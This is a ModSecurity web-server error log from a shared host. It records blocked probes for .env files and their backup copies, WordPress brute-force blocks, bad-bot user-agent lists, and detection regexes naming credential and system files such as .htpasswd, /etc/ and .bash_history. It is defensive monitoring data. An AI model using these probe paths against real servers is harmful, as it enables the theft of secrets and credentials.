[Tue May 26 16:25:19.900601 2026] [security2:error] [pid 795941:tid 796103] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Fu2GQ_TLE_VHIp2dQAAAAKU"]
[Tue May 26 16:25:21.277989 2026] [security2:error] [pid 795941:tid 796089] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8GO2GQ_TLE_VHIp2dagAAAJc"]
[Tue May 26 16:25:22.359083 2026] [security2:error] [pid 795941:tid 796139] [client 207.241.173.229:54864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.local.orig"] [unique_id "ahV8Gu2GQ_TLE_VHIp2drAAAAMk"]
[Tue May 26 16:25:22.359769 2026] [security2:error] [pid 795941:tid 796082] [client 207.241.173.229:54832] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.local~"] [unique_id "ahV8Gu2GQ_TLE_VHIp2drgAAAJA"]
[Tue May 26 16:25:22.361116 2026] [security2:error] [pid 795941:tid 796112] [client 207.241.173.229:54814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.local.backup"] [unique_id "ahV8Gu2GQ_TLE_VHIp2drwAAAK4"]
[Tue May 26 16:25:22.361845 2026] [security2:error] [pid 795941:tid 796147] [client 207.241.173.229:54800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.local.bak"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dsQAAANE"]
[Tue May 26 16:25:22.362001 2026] [security2:error] [pid 795941:tid 796088] [client 207.241.173.229:54806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.local.old"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dsAAAAJY"]
[Tue May 26 16:25:22.364571 2026] [security2:error] [pid 795941:tid 796140] [client 207.241.173.229:54794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.copy"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dtQAAAMo"]
[Tue May 26 16:25:22.368265 2026] [security2:error] [pid 795941:tid 796152] [client 207.241.173.229:54782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.orig"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dtgAAANY"]
[Tue May 26 16:25:22.368683 2026] [security2:error] [pid 795941:tid 796194] [client 207.241.173.229:54770] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.swp"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dtwAAAQA"]
[Tue May 26 16:25:22.369352 2026] [security2:error] [pid 795941:tid 796133] [client 207.241.173.229:54768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env~"] [unique_id "ahV8Gu2GQ_TLE_VHIp2duAAAAMM"]
[Tue May 26 16:25:22.370809 2026] [security2:error] [pid 795941:tid 796086] [client 207.241.173.229:54740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.backup"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dugAAAJQ"]
[Tue May 26 16:25:22.371171 2026] [security2:error] [pid 795941:tid 796090] [client 207.241.173.229:54734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.old"] [unique_id "ahV8Gu2GQ_TLE_VHIp2duwAAAJg"]
[Tue May 26 16:25:22.372148 2026] [security2:error] [pid 795941:tid 796131] [client 207.241.173.229:54720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.bak"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dvAAAAME"]
[Tue May 26 16:25:22.957527 2026] [security2:error] [pid 795941:tid 796155] [client 66.249.70.141:54474] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dwQAAANk"]
[Tue May 26 16:25:23.376467 2026] [security2:error] [pid 795941:tid 796131] [client 207.241.173.229:54926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.production.swp"] [unique_id "ahV8G-2GQ_TLE_VHIp2d5wAAAME"]
[Tue May 26 16:25:24.096323 2026] [security2:error] [pid 795941:tid 796167] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Gu2GQ_TLE_VHIp2dyAAAAOU"]
[Tue May 26 16:25:24.326414 2026] [security2:error] [pid 795941:tid 796053] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8HO2GQ_TLE_VHIp2eCgAAz28"]
[Tue May 26 16:25:24.326619 2026] [security2:error] [pid 795941:tid 796145] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV8HO2GQ_TLE_VHIp2eCgAAz28"]
[Tue May 26 16:25:26.056524 2026] [security2:error] [pid 795941:tid 796120] [client 207.241.173.229:54946] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.production.copy"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eMwAAALY"]
[Tue May 26 16:25:26.057432 2026] [security2:error] [pid 795941:tid 796129] [client 207.241.173.229:54910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.production~"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eNAAAAL8"]
[Tue May 26 16:25:26.057488 2026] [security2:error] [pid 795941:tid 796153] [client 207.241.173.229:54938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.production.orig"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eMgAAANc"]
[Tue May 26 16:25:26.058027 2026] [security2:error] [pid 795941:tid 796073] [client 207.241.173.229:54868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.local.copy"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eOQAAAIc"]
[Tue May 26 16:25:26.058183 2026] [security2:error] [pid 795941:tid 796087] [client 207.241.173.229:54884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.production.old"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eOAAAAJU"]
[Tue May 26 16:25:26.058203 2026] [security2:error] [pid 795941:tid 796116] [client 207.241.173.229:54848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.local.swp"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eOgAAALI"]
[Tue May 26 16:25:26.058443 2026] [security2:error] [pid 795941:tid 796083] [client 207.241.173.229:54880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.production.bak"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eNwAAAJE"]
[Tue May 26 16:25:26.058540 2026] [security2:error] [pid 795941:tid 796095] [client 207.241.173.229:54888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env.production.backup"] [unique_id "ahV8Hu2GQ_TLE_VHIp2eNgAAAJ0"]
[Tue May 26 16:25:26.649187 2026] [security2:error] [pid 795941:tid 796091] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8HO2GQ_TLE_VHIp2eBgAAAJk"]
[Tue May 26 16:25:27.751500 2026] [security2:error] [pid 795941:tid 796072] [client 14.191.103.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8He2GQ_TLE_VHIp2eHwAAAIY"]
[Tue May 26 16:25:27.931037 2026] [security2:error] [pid 795941:tid 796171] [client 114.119.155.83:39295] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV8H-2GQ_TLE_VHIp2eYAAAAOk"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fproduct&manufacturer_id=11&page=8&product_id=95
[Tue May 26 16:25:28.139370 2026] [security2:error] [pid 795941:tid 796105] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8He2GQ_TLE_VHIp2eLAAAAKc"]
[Tue May 26 16:25:30.269450 2026] [security2:error] [pid 795941:tid 796137] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8IO2GQ_TLE_VHIp2eZQAAAMc"]
[Tue May 26 16:25:30.626403 2026] [security2:error] [pid 795941:tid 796072] [client 185.191.171.16:11664] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-14-18/list/"] [unique_id "ahV8Iu2GQ_TLE_VHIp2eowAAAIY"]
[Tue May 26 16:25:30.626532 2026] [security2:error] [pid 795941:tid 796072] [client 185.191.171.16:11664] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-14-18/list/"] [unique_id "ahV8Iu2GQ_TLE_VHIp2eowAAAIY"]
[Tue May 26 16:25:32.299876 2026] [security2:error] [pid 795941:tid 796076] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Iu2GQ_TLE_VHIp2engAAAIo"]
[Tue May 26 16:25:33.591728 2026] [security2:error] [pid 795941:tid 796158] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8I-2GQ_TLE_VHIp2eugAAANw"]
[Tue May 26 16:25:35.525067 2026] [security2:error] [pid 795941:tid 796187] [client 138.229.106.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8Ju2GQ_TLE_VHIp2e7QAAAPk"], referer: https://www.anujtradingco.com/
[Tue May 26 16:25:35.981405 2026] [security2:error] [pid 795941:tid 796149] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Je2GQ_TLE_VHIp2e4AAAANM"]
[Tue May 26 16:25:36.549011 2026] [security2:error] [pid 795941:tid 796111] [client 86.141.152.189:62207] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8KO2GQ_TLE_VHIp2fVQAArW8"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:36.789388 2026] [security2:error] [pid 795941:tid 796077] [client 86.141.152.189:62207] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8KO2GQ_TLE_VHIp2fWwAAizY"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:37.046441 2026] [security2:error] [pid 795941:tid 796073] [client 86.141.152.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8KO2GQ_TLE_VHIp2fZwAAAIc"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:37.082080 2026] [security2:error] [pid 795941:tid 796181] [client 138.229.106.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8KO2GQ_TLE_VHIp2fawAAAPM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1234114&moderation-hash=6b57cf664c9a913734dbc9e82706e6c6
[Tue May 26 16:25:37.314014 2026] [security2:error] [pid 795941:tid 796193] [client 86.141.152.189:62207] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahV8Ke2GQ_TLE_VHIp2fcwAA_2E"], referer: https://haddingtonwines.com/products/macallan-double-cask-scotch-whisky-miniature/
[Tue May 26 16:25:37.751605 2026] [security2:error] [pid 795941:tid 796175] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8KO2GQ_TLE_VHIp2fTgAAAO0"]
[Tue May 26 16:25:39.419823 2026] [security2:error] [pid 795941:tid 796195] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Ke2GQ_TLE_VHIp2fhgAAAQE"]
[Tue May 26 16:25:40.480240 2026] [security2:error] [pid 795941:tid 796123] [client 138.229.106.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8LO2GQ_TLE_VHIp2f0AAAALk"], referer: https://anujtradingco.com
[Tue May 26 16:25:41.368757 2026] [security2:error] [pid 795941:tid 796146] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8LO2GQ_TLE_VHIp2fzQAAANA"]
[Tue May 26 16:25:42.431657 2026] [security2:error] [pid 795941:tid 796198] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Le2GQ_TLE_VHIp2f5wAAAQQ"]
[Tue May 26 16:25:44.014983 2026] [core:error] [pid 795941:tid 796016] [remote 74.7.241.42:41254] AH10244: invalid URI path (/wp-content/plugins/woocommerce/assets/js/photoswipe/%url%), referer: https://www.kardashevtechnologies.com/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe.min.js?ver=4.1.1-wc.10.5.3
[Tue May 26 16:25:44.547973 2026] [core:crit] [pid 795941:tid 796142] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:25:44.713639 2026] [security2:error] [pid 795941:tid 796123] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8MO2GQ_TLE_VHIp2gJgAAALk"]
[Tue May 26 16:25:45.609818 2026] [security2:error] [pid 795941:tid 795977] [remote 109.205.180.55:33654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV8Me2GQ_TLE_VHIp2gSwAA0yM"]
[Tue May 26 16:25:46.242589 2026] [core:crit] [pid 795941:tid 796165] (13)Permission denied: [client 52.167.144.19:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:25:46.466550 2026] [security2:error] [pid 795941:tid 796096] [client 209.251.16.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8Mu2GQ_TLE_VHIp2gYAAAAJ4"], referer: https://www.anujtradingco.com/
[Tue May 26 16:25:47.205141 2026] [security2:error] [pid 795941:tid 796116] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Mu2GQ_TLE_VHIp2gXQAAALI"]
[Tue May 26 16:25:47.349148 2026] [security2:error] [pid 795941:tid 796162] [client 2.57.122.173:18322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahV8M-2GQ_TLE_VHIp2gcgAAAOA"]
[Tue May 26 16:25:47.753480 2026] [security2:error] [pid 795941:tid 796112] [client 209.251.16.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV8M-2GQ_TLE_VHIp2geAAAAK4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1442025&moderation-hash=83ac85537f64682b3f099fc49c85db9d
[Tue May 26 16:25:48.189522 2026] [security2:error] [pid 795941:tid 796196] [client 74.7.244.30:35144] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.login.traderscafe.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV8NO2GQ_TLE_VHIp2gfAABAkY"]
